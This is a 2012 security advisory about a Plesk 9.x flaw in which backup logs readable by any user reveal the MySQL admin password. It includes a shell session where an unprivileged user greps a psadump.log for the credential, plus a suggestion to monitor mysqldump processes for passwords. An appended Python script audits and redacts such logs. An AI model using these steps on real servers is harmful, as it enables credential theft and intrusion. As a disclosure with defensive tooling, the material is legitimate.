Parallels PLESK 9.x Insecure Permissions

2012-04-26T00:00:00
ID PACKETSTORM:112217
Type packetstorm
Reporter Nicolas Krassas
Modified 2012-04-26T00:00:00

Description

                                        
                                            `# Exploit Title: PLESK 9.x insecure directory permission ( admin password revealed )  
# Date: 25/04/2012  
# Author: Nicolas Krassas , twitter.com/dinosn  
# Software Link: www.*parallels*.com/*plesk*/  
# Version: 9.x  
# Tested on: ubuntu / centos  
  
During backup procedures, PLESK panel is keeping a detailed log of the  
process under /opt/psa/PMM/sessions in Debian/Ubuntu installations and  
/usr/local/psa/PMM/sessions in Centos under the directory with the current  
date. A detailed log file is created with the name psadump.log, with  
readable permissions for everyone. The file will reveal the admin password  
used from the backup process to dump the mysql databases from the sites  
being backed up.  
  
It's possible to locate data also under the sessions directory from  
incomplete/crashed backup sessions where the log files are not safely  
removed from the system.  
  
e.g.:  
  
$ id  
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)  
$ cd /opt/psa/PMM/sessions  
$ ls -Fal  
total 32  
drwxr-xr-x 8 root root 4096 2012-04-25 21:42 ./  
drwxr-xr-x 10 root root 4096 2009-12-03 22:07 ../  
drwxr-xr-x 3 root root 4096 2012-04-25 22:12 2012-04-25-211250.973/  
$ cat 2012-04-25-211250.973/psadump.log | grep admin  
18:52:26 INFO Executing bundle producer: '/usr/bin/mysqldump -h  
'localhost' -u 'admin' -p' PASSOWORD ' -P '3306' --quick --quote-names  
--add-drop-table --default-character-set=utf8 --set-charset 'DB'' in  
  
Old but I didn't see it listed, another way is to constantly monitor the  
system for the mysqldump process using a simple bash script to get the  
credentials as the process is running in the scheduled plesk backups.  
  
  
`
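As an added defensive check that is not part of the original advisory, the following Python script audits a PMM sessions directory for psadump.log files that are world-readable or still carry a cleartext mysqldump -p'...' argument, and redacts them in place. The directory layout and log line are constructed to mirror the listing above; the function names are my own.

```python
import re
import stat
import tempfile
from pathlib import Path

# Password argument as it appears in the logged mysqldump command line,
# e.g. "-p' PASSOWORD '"; group 2 is the (possibly space-padded) secret.
PASSWORD_ARG = re.compile(r"(-p')([^']*)(')")

def leaked_password(line):
    """True if a logged line still carries a cleartext -p'...' argument."""
    m = PASSWORD_ARG.search(line)
    return m is not None and m.group(2) != "***"

def audit_pmm_sessions(sessions_dir):
    """Report every psadump.log below sessions_dir as
    (path, world_readable, has_password); the secret itself is never returned."""
    findings = []
    for log in sorted(Path(sessions_dir).rglob("psadump.log")):
        world_readable = bool(log.stat().st_mode & stat.S_IROTH)
        has_password = any(leaked_password(l) for l in
                           log.read_text(errors="replace").splitlines())
        findings.append((str(log), world_readable, has_password))
    return findings

def redact_log(log_path):
    """Blank the password argument in place and restrict the file to its owner.
    Returns the number of substitutions made."""
    log = Path(log_path)
    text, count = PASSWORD_ARG.subn(r"\1***\3",
                                    log.read_text(errors="replace"))
    log.write_text(text)
    log.chmod(0o600)  # drop the group/world read bits the backup left behind
    return count

# Constructed sample session mirroring the advisory's listing (not a real log).
SAMPLE_LOG = ("18:52:25 INFO Starting backup of 'DB'\n"
              "18:52:26 INFO Executing bundle producer: '/usr/bin/mysqldump -h "
              "'localhost' -u 'admin' -p' PASSOWORD ' -P '3306' --quick 'DB'' in\n")

def demo():
    # Build a throwaway sessions tree, audit it, redact it, audit again.
    sessions = Path(tempfile.mkdtemp()) / "sessions"
    log = sessions / "2012-04-25-211250.973" / "psadump.log"
    log.parent.mkdir(parents=True)
    log.write_text(SAMPLE_LOG)
    log.chmod(0o644)  # the world-readable mode described in the advisory
    before = audit_pmm_sessions(sessions)
    redacted = redact_log(log)
    after = audit_pmm_sessions(sessions)
    return before, redacted, after
```

Run audit_pmm_sessions against the real sessions path from a cron job to catch logs left behind by crashed backups; redact_log is a stop-gap until the panel itself stops writing the credential.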